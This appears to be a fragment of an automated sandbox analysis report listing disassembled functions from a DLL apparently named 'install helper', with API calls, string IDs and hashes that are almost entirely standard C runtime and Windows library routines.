                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: $!$@
                                                            • API String ID: 3519838083-2517134481
                                                            • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                                            • Instruction ID: 5d4803d23cd70038e5cd01fb5db85d7a1b81b9fe6c0aabdaf88a946f4c78c755
                                                            • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                                            • Instruction Fuzzy Hash: A0128D70E16649DFCF04CFA4C5D0ADDBBB1BF09308F14846AE845ABB51EB31A955CBA0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog__aulldiv
                                                            • String ID: $SJ
                                                            • API String ID: 4125985754-3948962906
                                                            • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                                            • Instruction ID: 9b63b46e7e4638f3a98de9b33b3f1f4adb5596a34a047585628e80cd3cf0a32d
                                                            • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                                            • Instruction Fuzzy Hash: 93B16DB1D002099FDB14CFA6CAD49AEBBB1FF48318B20856ED556A7B50E730AA45CB50
                                                            APIs
                                                              • Part of subcall function 6CC17327: __EH_prolog3.LIBCMT ref: 6CC1732E
                                                              • Part of subcall function 6CC17327: std::_Lockit::_Lockit.LIBCPMT ref: 6CC17339
                                                              • Part of subcall function 6CC17327: std::locale::_Setgloballocale.LIBCPMT ref: 6CC17354
                                                              • Part of subcall function 6CC17327: _Yarn.LIBCPMT ref: 6CC1736A
                                                              • Part of subcall function 6CC17327: std::_Lockit::~_Lockit.LIBCPMT ref: 6CC173A7
                                                              • Part of subcall function 6CAE2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CAE2F95
                                                              • Part of subcall function 6CAE2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CAE2FAF
                                                              • Part of subcall function 6CAE2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CAE2FD0
                                                              • Part of subcall function 6CAE2F60: __Getctype.LIBCPMT ref: 6CAE3084
                                                              • Part of subcall function 6CAE2F60: std::_Facet_Register.LIBCPMT ref: 6CAE309C
                                                              • Part of subcall function 6CAE2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CAE30B7
                                                            • std::ios_base::_Addstd.LIBCPMT ref: 6CAE211B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                             • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                            • API String ID: 3332196525-1866435925
                                                            • Opcode ID: 9d50bad52c31cd4c1982d27629181c6351e0ddb4cc871c148b25e0c5d697b095
                                                            • Instruction ID: c3a87a59d35137d4d280d12383240964fc5fffe115b91ab035c123569a17377f
                                                            • Opcode Fuzzy Hash: 9d50bad52c31cd4c1982d27629181c6351e0ddb4cc871c148b25e0c5d697b095
                                                            • Instruction Fuzzy Hash: 4C41A0B1A0034A8FDB00CF64D8457AABBB1FF48318F148268E919AB791E775D985CBD1
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 6CC74ECC
                                                              • Part of subcall function 6CC5F58A: __EH_prolog.LIBCMT ref: 6CC5F58F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: :hJ$dJ$xJ
                                                            • API String ID: 3519838083-2437443688
                                                            • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                                            • Instruction ID: 6edf1d88b6ff90497481ee987eee6d8616ab23d75f623b269e7a81d8aa5416a8
                                                            • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                                            • Instruction Fuzzy Hash: 5F21ECB1805B40CFC760CF6AC14428ABBF4FF69708B50C96EC1AA97B11E7B8A508CF55
                                                            APIs
                                                            • SetFilePointerEx.KERNEL32(00000000,?,00000000,6CC2B0D0,6CAE1DEA,00008000,6CC2B0D0,?,?,?,6CC2AC7F,6CC2B0D0,?,00000000,6CAE1DEA), ref: 6CC2ADC9
                                                            • GetLastError.KERNEL32(?,?,?,6CC2AC7F,6CC2B0D0,?,00000000,6CAE1DEA,?,6CC3469E,6CC2B0D0,000000FF,000000FF,00000002,00008000,6CC2B0D0), ref: 6CC2ADD3
                                                            • __dosmaperr.LIBCMT ref: 6CC2ADDA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                             • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer__dosmaperr
                                                            • String ID: 8Q
                                                            • API String ID: 2336955059-4022487301
                                                            • Opcode ID: 35b02b5c17c6af6773bb8dbece32e6ddc0c3c2e78824114733bb47bab3737c47
                                                            • Instruction ID: b0a3403ca604ae3de56c1eb41090191069d74c908dc632c20fe9f956b00a73dd
                                                            • Opcode Fuzzy Hash: 35b02b5c17c6af6773bb8dbece32e6ddc0c3c2e78824114733bb47bab3737c47
                                                            • Instruction Fuzzy Hash: 9401F733714515AFCF059FAACC059DE7B39EBC6325F384288E8119B680FB75D9018BA0
                                                            APIs
                                                            • GetLastError.KERNEL32(00000008,?,00000000,6CC28453), ref: 6CC249B7
                                                            • _free.LIBCMT ref: 6CC24A14
                                                            • _free.LIBCMT ref: 6CC24A4A
                                                            • SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 6CC24A55
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                             • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast_free
                                                            • String ID:
                                                            • API String ID: 2283115069-0
                                                            • Opcode ID: 4f9f194688982e0f6629539d7ea6fe70dbb2e4b30054aab67ac04769782dfedf
                                                            • Instruction ID: f8517e21a4bf31267f81d183e625ed6a757e16f8b9a20d035ac6bbb6cfd4f00f
                                                            • Opcode Fuzzy Hash: 4f9f194688982e0f6629539d7ea6fe70dbb2e4b30054aab67ac04769782dfedf
                                                            • Instruction Fuzzy Hash: 8311CA32704601ABEB01EEB95CC5D5A257DABC277C7250625F634A7FC0FF2D8C495124
                                                            APIs
                                                            • WriteConsoleW.KERNEL32(00000000,?,6CC346EC,00000000,00000000,?,6CC34B51,00000000,00000001,00000000,6CC2B0D0,?,6CC2C286,?,?,6CC2B0D0), ref: 6CC35ED1
                                                            • GetLastError.KERNEL32(?,6CC34B51,00000000,00000001,00000000,6CC2B0D0,?,6CC2C286,?,?,6CC2B0D0,?,6CC2B0D0,?,6CC2BD1C,6CC35AB6), ref: 6CC35EDD
                                                              • Part of subcall function 6CC35F2E: CloseHandle.KERNEL32(FFFFFFFE,6CC35EED,?,6CC34B51,00000000,00000001,00000000,6CC2B0D0,?,6CC2C286,?,?,6CC2B0D0,?,6CC2B0D0), ref: 6CC35F3E
                                                            • ___initconout.LIBCMT ref: 6CC35EED
                                                              • Part of subcall function 6CC35F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CC35EAB,6CC34B3E,6CC2B0D0,?,6CC2C286,?,?,6CC2B0D0,?), ref: 6CC35F22
                                                            • WriteConsoleW.KERNEL32(00000000,?,6CC346EC,00000000,?,6CC34B51,00000000,00000001,00000000,6CC2B0D0,?,6CC2C286,?,?,6CC2B0D0,?), ref: 6CC35F02
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                             • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                            • String ID:
                                                            • API String ID: 2744216297-0
                                                            • Opcode ID: 6a409476853ea9fe065c8472ef88824304d5c88cd2dc96d785eb066b63496c07
                                                            • Instruction ID: 409dd46df1499e7e567f1bc14c1c70340c376ce86613e6cdb136c47c334990e1
                                                            • Opcode Fuzzy Hash: 6a409476853ea9fe065c8472ef88824304d5c88cd2dc96d785eb066b63496c07
                                                            • Instruction Fuzzy Hash: F5F0AC3A600225BBCF126FA5EC049C93F36FB097A5B189550FA1996620DB32C825DB90
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                             • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog3_
                                                            • String ID: 8Q
                                                            • API String ID: 2427045233-4022487301
                                                            • Opcode ID: 6a205434802f58a230b7a63387d3b17a732e23ab906800b611deaac446b37141
                                                            • Instruction ID: 11303831dda992be2867e77545a65f8530ac482fcd83e4cc8e75d078861b264c
                                                            • Opcode Fuzzy Hash: 6a205434802f58a230b7a63387d3b17a732e23ab906800b611deaac446b37141
                                                            • Instruction Fuzzy Hash: C071A371D052569FDB108F96C884AEE7BBDBF45318F1C4229E920A7A40FF798947CB60
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 6CC68C5D
                                                              • Part of subcall function 6CC6761A: __EH_prolog.LIBCMT ref: 6CC6761F
                                                              • Part of subcall function 6CC67A2E: __EH_prolog.LIBCMT ref: 6CC67A33
                                                              • Part of subcall function 6CC68EA5: __EH_prolog.LIBCMT ref: 6CC68EAA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: WZJ
                                                            • API String ID: 3519838083-1089469559
                                                            • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                                            • Instruction ID: e9b9b5701c863c0f5671f18d2aa8b7d446014358b809268feac90f724a3623e4
                                                            • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                                            • Instruction Fuzzy Hash: 94818C31D00159DFCF15DFA5DA90ADDB7B4AF19318F10809AE502B7BA0EB30AE09CB60
                                                            APIs
                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 6CAE2A76
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                             • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ___std_exception_destroy
                                                            • String ID: Jbx$Jbx
                                                            • API String ID: 4194217158-1161259238
                                                            • Opcode ID: 1207350f1391095ca387c9c024334eb45c769006bc0cd3943af905c0ce782d88
                                                            • Instruction ID: 4a316ff4207d29c8ffb30c84d5f8e80bc0fc5f87ad0244c0dfc98ccbd91dd2c7
                                                            • Opcode Fuzzy Hash: 1207350f1391095ca387c9c024334eb45c769006bc0cd3943af905c0ce782d88
                                                            • Instruction Fuzzy Hash: A45124B19002058FCB10CF69D884A9EBBB5FF89314F15866EE8499BB41E331D9C5DBD2
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                             • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: CK$CK
                                                            • API String ID: 3519838083-2096518401
                                                            • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                                                            • Instruction ID: bf5cfe0e4e77e41be1d65e7afe0551b7f9083573ffe52269f7cc8387e8fd30d2
                                                            • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                                                            • Instruction Fuzzy Hash: 46518C75A00705DFDB40CFA5C8C0BEEB3B5FB88758F158529D901EBA81EB74E9058BA0
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6CC346D6), ref: 6CC2D01B
                                                            • __dosmaperr.LIBCMT ref: 6CC2D022
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast__dosmaperr
                                                            • String ID: 8Q
                                                            • API String ID: 1659562826-4022487301
                                                            • Opcode ID: b21e4fd4fa3df4c256f71733e228a7b5a00f7f66b0e4ce987025dc06d6e78c5a
                                                            • Instruction ID: e7e80d4506c6f0ecafd2c1c6f9c7c6908ee5ab8286ae3afa0726352610046a50
                                                            • Opcode Fuzzy Hash: b21e4fd4fa3df4c256f71733e228a7b5a00f7f66b0e4ce987025dc06d6e78c5a
                                                            • Instruction Fuzzy Hash: 2C419B71614194AFE721EF6DC880BA9BFE5FF46314F244259E8808BA41F379DD16C790
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: 0|J$`)L
                                                            • API String ID: 3519838083-117937767
                                                            • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                                            • Instruction ID: 8b9e880a648d79117e45a7abce42fdb5c4dfd394012add693b99b00e930c4b83
                                                            • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                                            • Instruction Fuzzy Hash: 05418F31602745EFCB11CF64C5A0BEBBBEAFF45208F04846EE45A97B50EB31A905CB91
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: @$LuJ
                                                            • API String ID: 3519838083-205571748
                                                            • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                                            • Instruction ID: c9ea835f0f6db484c7346abfd189aaf92b7fb8b8d0a9ce612a11877a1c274790
                                                            • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                                            • Instruction Fuzzy Hash: F80184B2E02349DADB10DF9988805AFFBB4FF59708F40842EE569E3A41E3745904CB59
                                                            APIs
                                                            • _free.LIBCMT ref: 6CC2DD49
                                                            • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6CC2A63A,?,00000004,?,4B42FCB6,?,?,6CC1F78C,4B42FCB6,?), ref: 6CC2DD85
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: AllocHeap_free
                                                            • String ID: 8Q
                                                            • API String ID: 1080816511-4022487301
                                                            • Opcode ID: 2b0831dc230305c20008f2042316344fd3af67af5ee8e000d88a2a9d398bc56f
                                                            • Instruction ID: 67fd07d8b87d8d5391466503e12ab5abda298955e84e8c5990a1bd58b191906d
                                                            • Opcode Fuzzy Hash: 2b0831dc230305c20008f2042316344fd3af67af5ee8e000d88a2a9d398bc56f
                                                            • Instruction Fuzzy Hash: 01F0F632605A556BDB211E27AC40B9A37689FD3B78F254195F964ABE90FF2CD401C1F0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: p/K$J
                                                            • API String ID: 3519838083-2069324279
                                                            • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                                                            • Instruction ID: 6a9cebe8ebc7f3db7c2434022db1a9ebd9cdba5c155df28b1d26bb8d52489ef7
                                                            • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                                                            • Instruction Fuzzy Hash: 0401BCB2A117119FD724CF99C5047AAB7F8EF45729F10C81E9062A3B40D7F8A5088BA4
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 6CC8AFCC
                                                              • Part of subcall function 6CC8A4D1: __EH_prolog.LIBCMT ref: 6CC8A4D6
                                                              • Part of subcall function 6CC8914B: __EH_prolog.LIBCMT ref: 6CC89150
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: J$0J
                                                            • API String ID: 3519838083-2882003284
                                                            • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                                                            • Instruction ID: 4a98b72c75123753beac9f67a0d961e6301b9730aae78937ac22fe023952123c
                                                            • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                                                            • Instruction Fuzzy Hash: 900105B1805B50CFC325CF55C5A428AFBE0BB15308F90C95EC0A657B50E7B8A508CB68
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D)K$H)K$P)K$T)K
                                                            • API String ID: 0-2262112463
                                                            • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                                                            • Instruction ID: ee475fb7c68c3f1aace00a23b3a1e8d5e18c8e66a727c4201b015733077c0e91
                                                            • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                                                            • Instruction Fuzzy Hash: AE51DC7090420A9FCF11CFA5DD44ADEB7B5BF4932CF10D02AE81167A81FB71A94ACB90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (?K$8?K$H?K$CK
                                                            • API String ID: 0-3450752836
                                                            • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                                                            • Instruction ID: 10b4a97090a0e5bb5fa2235a1bff72515717fba06b68384084b260cd31cced29
                                                            • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                                                            • Instruction Fuzzy Hash: 22F030B06117009FC320CF05D54879BF7F4EB46709F50CD1EE19A9BA40D3B8A5088FA9